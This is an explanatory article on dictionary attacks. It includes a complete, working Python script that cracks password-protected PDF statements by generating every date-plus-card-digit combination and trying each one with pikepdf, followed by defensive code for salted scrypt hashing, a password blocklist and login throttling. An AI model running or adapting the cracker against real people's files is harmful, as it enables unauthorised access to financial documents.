The Hidden Danger of Dictionary Attacks
What is a Dictionary Attack?
A dictionary attack is a type of cyberattack in which an attacker systematically tries to gain unauthorized access to a user's account or system by trying out a vast number of potential passwords. Unlike brute-force attacks that try every possible combination of characters, dictionary attacks focus on trying a list of commonly used passwords, words from dictionaries, or variations thereof.
The process involves using automated software or scripts to iterate through a list of passwords, which can include common words, phrases, names, and terms found in dictionaries, as well as variations like adding numbers or special characters to the end of words. The goal is to match one of these potential passwords to the actual password used by the target user.
Dictionary attacks take advantage of the fact that many users still use weak and easily guessable passwords, often derived from familiar words or personal information. By leveraging a targeted list of potential passwords, attackers can increase their chances of successfully cracking accounts with minimal effort and time.
Anatomy of a Dictionary Attack
At its core, a dictionary attack is a password-cracking attack that exploits the human tendency to choose simple and common passwords. Unlike brute-force attacks that exhaustively try every possible combination, dictionary attacks take a targeted approach: they try the guesses most likely to be right first. Here's how it typically unfolds:
Gathering Password Candidates: Attackers compile a list of potential passwords, often using dictionaries containing common words, phrases, and variations. These lists can also include personal information about the target, like birthdays or pet names.
Automated Trial and Error: Using automated scripts or tools, attackers systematically try each password candidate from the list against the target account or system.
Success or Failure: If the target's password matches one of the candidates, the attacker gains unauthorized access. If not, they might refine their list and try again.
Real Case Example of Dictionary Attack
Password Protected PDF
Companies often password-protect sensitive PDF documents such as salary statements or credit card statements and send them individually to recipients every month. The passwords follow a fixed format that the company tells the recipient about, and a recurring pattern is easy to spot: the company's initials followed by a date, or a date followed by the last four digits of the corresponding credit card number. A format like that is a dictionary attack's ideal target. The attacker does not even need a wordlist, only a generator for every value the format allows, and because the PDF is cracked offline there is no server to lock the account or slow the attempts down.
Here is a short explanation of how cracking such a password-protected PDF works:
All you need is four scripts:
- A script that lists every date in ddmmyyyy format from a chosen start date to a chosen end date
- A script that lists all four-digit strings from 0000 to 9999
- A script that combines every date with every four-digit string into a candidate password
- A script that uses a PDF library (for example pikepdf in Python) to try each candidate until the document opens
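The four scripts above collapse into one short program. What follows is an added example written for this page, not the article's own code. The date range, the initials ACME and the file name statement.pdf are assumptions, and the pikepdf call sits behind a lazy import so that the generators and the keyspace count run without the library installed. It also makes the practitioner's point explicit: a year of dates times 10,000 suffixes is about 3.7 million guesses, which is trivial to run offline, and if the attacker already knows the card's last four digits (from a receipt, say) the keyspace shrinks to the number of days.

```python
"""Candidate generation and trial for the password-protected-PDF case above.
Added example, not the article's own scripts. The date range, the company
initials "ACME" and the PDF path in main() are assumptions for illustration."""
from datetime import date, timedelta
from typing import Callable, Iterable, Iterator, Optional


def date_strings(start: date, end: date) -> Iterator[str]:
    """Every calendar day from start to end inclusive, formatted ddmmyyyy."""
    day = start
    while day <= end:
        yield day.strftime("%d%m%Y")
        day += timedelta(days=1)


def four_digit_strings() -> Iterator[str]:
    """0000 .. 9999, zero-padded: the space of 'last four digits of the card'."""
    for n in range(10_000):
        yield f"{n:04d}"


def date_card_candidates(start: date, end: date) -> Iterator[str]:
    """Second format from the article: <ddmmyyyy><last four card digits>."""
    for d in date_strings(start, end):
        for tail in four_digit_strings():
            yield d + tail


def initials_date_candidates(initials: str, start: date, end: date) -> Iterator[str]:
    """First format from the article: <company initials><ddmmyyyy>."""
    for d in date_strings(start, end):
        yield initials + d


def keyspace_size(start: date, end: date, card_digits: bool = True) -> int:
    """Worst-case number of guesses. Knowing the card's last four digits
    removes the factor of 10_000 and leaves only the number of days."""
    days = (end - start).days + 1
    return days * 10_000 if card_digits else days


def crack(candidates: Iterable[str], try_password: Callable[[str], bool]) -> Optional[str]:
    """Try each candidate in order; return the first one that opens the document, else None."""
    for pw in candidates:
        if try_password(pw):
            return pw
    return None


def pdf_opener(path: str) -> Callable[[str], bool]:
    """Build a try_password callback backed by pikepdf (pip install pikepdf).
    Imported lazily so the functions above work without the library."""
    import pikepdf

    def attempt(pw: str) -> bool:
        try:
            with pikepdf.open(path, password=pw):
                return True
        except pikepdf.PasswordError:
            return False

    return attempt


if __name__ == "__main__":
    start, end = date(2024, 1, 1), date(2024, 12, 31)  # assumed statement period
    print("worst case guesses, date+card:", keyspace_size(start, end))
    print("worst case guesses, initials+date:", keyspace_size(start, end, card_digits=False))
    # Real run against a file (path is an assumption); uncomment once pikepdf is installed:
    # print(crack(date_card_candidates(start, end), pdf_opener("statement.pdf")))
```

The trial function is separated from the candidate generators on purpose: the same crack() loop works against any offline target (a ZIP, an office document, a hash dump) once you supply a different try_password callback, and it is the callback's speed, not the generator's, that bounds the attack.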
The Engineering Challenge
Engineers face the complex task of devising robust mechanisms to defend against dictionary attacks. Here are some key engineering considerations:
Hashing Algorithms: User passwords are never stored in the clear; they are stored as the output of a password-hashing function. The hash cannot be reversed, so a stolen database forces the attacker to run the dictionary attack offline against the hashes, and the cost of that attack is set by the hash's speed. A general-purpose hash such as SHA-256 is the wrong tool because it is designed to be fast; a dedicated password hash (Argon2id, scrypt, bcrypt, PBKDF2) is deliberately slow and memory-hungry so that every guess costs the attacker real time and hardware.
Salting: A unique random salt is stored alongside each password and mixed in before hashing, so two users with the same password get different hashes. This defeats precomputed tables and forces the attacker to run the whole dictionary separately for every account instead of once for the entire database.
Password Policies: Engineers implement and enforce password policies. The traditional rules (a mandatory mix of character types, a minimum length, no common dictionary words) are only partly useful: users answer character-class requirements with predictable variations such as Password1!, which cracking tools generate anyway. Current guidance (NIST SP 800-63B) favours a reasonable minimum length plus rejecting any password that appears on a list of common or previously breached passwords, which is precisely the list the attacker is working from.
Account Lockouts and Delays: Temporarily locking an account after a certain number of failed login attempts, or inserting a growing delay between attempts, throttles online dictionary attacks. Two caveats apply: lockouts alone let an attacker deliberately lock out legitimate users, so they are combined with per-source rate limits; and they do nothing against offline attacks such as the PDF example above, where the attacker holds the encrypted file and can guess as fast as the hardware allows.
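The four considerations above, as an added example in Python that is not part of the original article: a scrypt-based password hash with a per-user random salt and constant-time comparison, a length-plus-blocklist acceptance check, and a per-account throttle with exponential back-off and lockout. The blocklist contents, the work factors and the lockout parameters are illustrative assumptions; scrypt is used because it ships in the standard library, and Argon2id is the better choice where a third-party package can be installed.

```python
"""Defensive side of the four considerations: slow salted hashing, a password
blocklist, and per-account throttling of failed logins.
Added example, not from the article; standard library only. scrypt stands in
for Argon2id, which is preferred but needs a third-party package."""
import hashlib
import hmac
import os
import time
from typing import Callable, Dict, Tuple

# Work factor: N=2**14, r=8, p=1 uses 16 MiB and tens of milliseconds per hash,
# turning millions of offline guesses per second into a few dozen.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1

# Constructed blocklist for illustration only; production checks against a
# corpus of leaked passwords, not a handful of literals.
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "welcome1"}


def is_acceptable(password: str, min_len: int = 12) -> bool:
    """Length plus a blocklist of known-cracked passwords, not character-class rules."""
    return len(password) >= min_len and password.lower() not in COMMON_PASSWORDS


def hash_password(password: str) -> str:
    """Fresh 16-byte random salt per user; parameters are stored with the hash
    so the work factor can be raised later without breaking old records."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P)
    return f"scrypt${SCRYPT_N}${SCRYPT_R}${SCRYPT_P}${salt.hex()}${digest.hex()}"


def verify_password(stored: str, password: str) -> bool:
    """Recompute with the stored salt and parameters; compare in constant time."""
    algo, n, r, p, salt_hex, digest_hex = stored.split("$")
    if algo != "scrypt":
        return False
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                            n=int(n), r=int(r), p=int(p))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


# Verified against for unknown usernames so a missing account costs the same
# time as a wrong password; otherwise timing reveals which usernames exist.
DUMMY_HASH = hash_password(os.urandom(16).hex())


class LoginThrottle:
    """Per-account back-off: the delay doubles with each failure, then a fixed
    lock applies after max_failures. State is in-memory here; a real deployment
    shares it across servers and adds per-source-IP limits, since account
    lockouts alone let an attacker lock victims out on purpose."""

    def __init__(self, max_failures: int = 5, base_delay: float = 1.0,
                 lock_seconds: float = 900.0, clock: Callable[[], float] = time.time):
        self.max_failures, self.base_delay = max_failures, base_delay
        self.lock_seconds, self.clock = lock_seconds, clock
        self._state: Dict[str, Tuple[int, float]] = {}  # user -> (failures, not_before)

    def seconds_until_allowed(self, user: str) -> float:
        _, not_before = self._state.get(user, (0, 0.0))
        return max(0.0, not_before - self.clock())

    def record_failure(self, user: str) -> None:
        failures = self._state.get(user, (0, 0.0))[0] + 1
        if failures >= self.max_failures:
            delay = self.lock_seconds
        else:
            delay = self.base_delay * 2 ** (failures - 1)
        self._state[user] = (failures, self.clock() + delay)

    def record_success(self, user: str) -> None:
        self._state.pop(user, None)


def login(users: Dict[str, str], throttle: LoginThrottle, user: str, password: str) -> bool:
    """Refuse while throttled without touching the hash; otherwise verify and update the counter."""
    if throttle.seconds_until_allowed(user) > 0:
        return False
    ok = verify_password(users.get(user, DUMMY_HASH), password) and user in users
    if ok:
        throttle.record_success(user)
    else:
        throttle.record_failure(user)
    return ok
```

Note the division of labour: LoginThrottle only slows an attacker who must go through the login endpoint, while the scrypt work factor and per-user salt are what raise the cost once the hash table itself has leaked and the attack goes offline, as in the PDF case.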
Conclusion
In the intricate dance between hackers and engineers, the dictionary attack is a formidable move in the attacker's playbook. However, engineers armed with cryptographic expertise and a deep understanding of human behavior continue to innovate and bolster their defenses. By implementing advanced hashing, salting, and smart user authentication strategies, engineers work tirelessly to fortify systems and keep users' digital lives safe from the clutches of these relentless attacks.